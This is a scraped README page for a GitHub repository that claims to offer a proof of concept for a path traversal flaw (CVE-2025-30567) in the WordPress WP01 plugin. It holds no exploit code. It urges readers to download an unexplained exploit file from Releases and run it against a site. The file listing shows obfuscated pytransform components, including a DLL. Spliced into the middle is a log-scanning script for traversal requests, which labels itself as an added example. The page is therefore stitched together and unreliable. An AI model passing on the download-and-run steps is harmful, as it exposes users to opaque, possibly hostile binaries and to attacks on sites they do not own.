CVE-2025-30567 PoC — WordPress WP01 plugin <= 2.6.2 - Arbitrary File Download Vulnerability

Source
Associated Vulnerability
Title: WordPress WP01 plugin <= 2.6.2 - Arbitrary File Download Vulnerability (CVE-2025-30567)
Description: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP01 WP01 wp01 allows Path Traversal. This issue affects WP01: from n/a through <= 2.6.2.
Description
CVE-2025-30567 - WordPress WP01 < Path traversal
Readme
# CVE-2025-30567 - WordPress WP01 Path Traversal Exploit

![CVE-2025-30567](https://img.shields.io/badge/CVE-2025--30567-red) ![WordPress](https://img.shields.io/badge/WordPress-4.0%2B-blue)

## Overview

Welcome to the CVE-2025-30567 Proof of Concept (PoC) repository. This project demonstrates a path traversal vulnerability in WordPress WP01. The vulnerability allows attackers to access files outside the intended directory structure. This can lead to sensitive data exposure and potentially compromise the integrity of the application.

## Table of Contents

- [Description](#description)
- [Vulnerability Details](#vulnerability-details)
- [Installation](#installation)
- [Usage](#usage)
- [Contributing](#contributing)
- [License](#license)
- [Links](#links)

## Description

CVE-2025-30567 targets the WordPress WP01 plugin. This vulnerability stems from improper input validation, which enables attackers to manipulate file paths. The PoC provided here allows you to test the vulnerability in a controlled environment. Understanding this exploit can help developers patch their applications and secure their systems against potential attacks.

## Vulnerability Details

- **CVE ID:** CVE-2025-30567
- **Affected Software:** WordPress WP01
- **Type:** Path Traversal
- **Severity:** High

### Impact

An attacker can exploit this vulnerability to read arbitrary files on the server. This can lead to:

- Exposure of sensitive information (e.g., configuration files, user data)
- Further exploitation of the server
- Potential data breaches

### Affected Versions

This vulnerability affects all versions of WordPress WP01 prior to the patch release. Users should upgrade to the latest version to mitigate this risk.
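
For sites that ran an affected version, web-server access logs can be reviewed for requests that carry a `..` path segment once percent-encoding is removed, including double-encoded forms. The following is an added example, not code from this repository or from the plugin; the log lines are constructed, and the `example_download` action and `file` parameter are hypothetical placeholders rather than the plugin's real endpoint.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format). The action name and
# "file" parameter are hypothetical, not taken from the WP01 plugin.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=example_download&file=report.pdf HTTP/1.1" 200 5120
203.0.113.9 - - [01/Apr/2025:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=example_download&file=../../../wp-config.php HTTP/1.1" 200 3211
203.0.113.9 - - [01/Apr/2025:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=example_download&file=%252e%252e%252fwp-config.php HTTP/1.1" 403 0
198.51.100.2 - - [01/Apr/2025:10:01:00 +0000] "GET /blog/a..b/?q=1 HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')
# A ".." segment bounded by a separator on the left and a slash,
# backslash or end of string on the right, checked after decoding.
DOTDOT = re.compile(r'(?:^|[\\/=&?])\.\.(?:[\\/]|$)')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(log_text):
    """Return (client, status, decoded_target) for requests with a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target, status = m.groups()
        decoded = fully_decode(target)
        if DOTDOT.search(decoded):
            hits.append((client, int(status), decoded))
    return hits


def served_hits(log_text):
    """Traversal requests answered with a 2xx status are the ones to review first."""
    return [h for h in find_traversal(log_text) if 200 <= h[1] < 300]
```

A 2xx response to a matching request, especially with a body size that matches a configuration file, is the signal to prioritise; blocked requests (403/404) show probing but not disclosure.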

## Installation

To set up the PoC, follow these steps:

1. Clone the repository:
   ```bash
   git clone https://github.com/KaxuFF/CVE-2025-30567-PoC.git
   ```

2. Navigate to the project directory:
   ```bash
   cd CVE-2025-30567-PoC
   ```

3. Ensure you have the necessary dependencies installed. You may need to install specific libraries or tools based on your environment.

4. Download the exploit file from the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases). This file needs to be downloaded and executed to test the vulnerability.

## Usage

Once you have the exploit file, follow these steps to use it:

1. Ensure your WordPress WP01 installation is running.
2. Execute the downloaded exploit file:
   ```bash
   ./exploit-file-name
   ```

3. Observe the output. If the vulnerability is present, you will see the contents of sensitive files displayed in the console.

### Example Command

Here is an example command to execute the exploit:

```bash
./exploit-file-name --target http://your-wordpress-site.com
```

Replace `http://your-wordpress-site.com` with the URL of your WordPress installation.

## Contributing

Contributions are welcome! If you would like to help improve this project, please follow these steps:

1. Fork the repository.
2. Create a new branch:
   ```bash
   git checkout -b feature/YourFeature
   ```

3. Make your changes and commit them:
   ```bash
   git commit -m "Add your message here"
   ```

4. Push to the branch:
   ```bash
   git push origin feature/YourFeature
   ```

5. Create a pull request.

Please ensure that your contributions adhere to the coding standards and best practices.

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.

## Links

For more information, visit the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases) to download the exploit file and access the latest updates. 

Feel free to explore the various topics related to this repository:

- [codeb0ss](https://github.com/topics/codeb0ss)
- [cve-2025](https://github.com/topics/cve-2025)
- [cve-2025-30567](https://github.com/topics/cve-2025-30567)
- [cve-2025-30567-exp](https://github.com/topics/cve-2025-30567-exp)
- [cve-2025-30567-poc](https://github.com/topics/cve-2025-30567-poc)
- [cve-2025-30567-wordpress](https://github.com/topics/cve-2025-30567-wordpress)
- [cves](https://github.com/topics/cves)
- [exploits](https://github.com/topics/exploits)
- [uncodeboss](https://github.com/topics/uncodeboss)
- [wordpress](https://github.com/topics/wordpress)

Thank you for your interest in CVE-2025-30567!
File Snapshot

```
[4.0K] /data/pocs/dbd98ffa281a1da0d10e797185a5b02dccddd024
├── [ 19K] CVE-2025-30567.py
├── [4.0K] pytransform
│   ├── [   1] @
│   ├── [ 11K] __init__.py
│   ├── [ 15K] __init__.pyc
│   ├── [ 220] license.lic
│   ├── [699K] _pytransform.dll
│   └── [ 476] pytransform.key
└── [4.3K] README.md

1 directory, 8 files
```